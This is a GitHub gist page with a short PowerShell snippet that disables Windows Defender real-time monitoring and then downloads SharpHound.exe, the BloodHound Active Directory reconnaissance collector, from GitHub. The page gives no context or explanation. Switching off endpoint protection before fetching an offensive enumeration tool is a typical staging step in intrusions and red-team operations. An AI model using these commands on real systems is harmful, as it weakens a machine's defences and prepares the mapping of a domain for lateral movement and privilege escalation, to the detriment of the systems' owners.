Skip to content

Instantly share code, notes, and snippets.

@mikeplavsky
Created July 19, 2022 21:54
Show Gist options
  • Save mikeplavsky/7067cb6ec8a61e05bcb108d3e04d817b to your computer and use it in GitHub Desktop.
Save mikeplavsky/7067cb6ec8a61e05bcb108d3e04d817b to your computer and use it in GitHub Desktop.
Set-MpPreference -DisableRealtimeMonitoring $true
$ProgressPreference = 'SilentlyContinue'
$url = “https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe”
Invoke-WebRequest $url -OutFile SharpHound.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment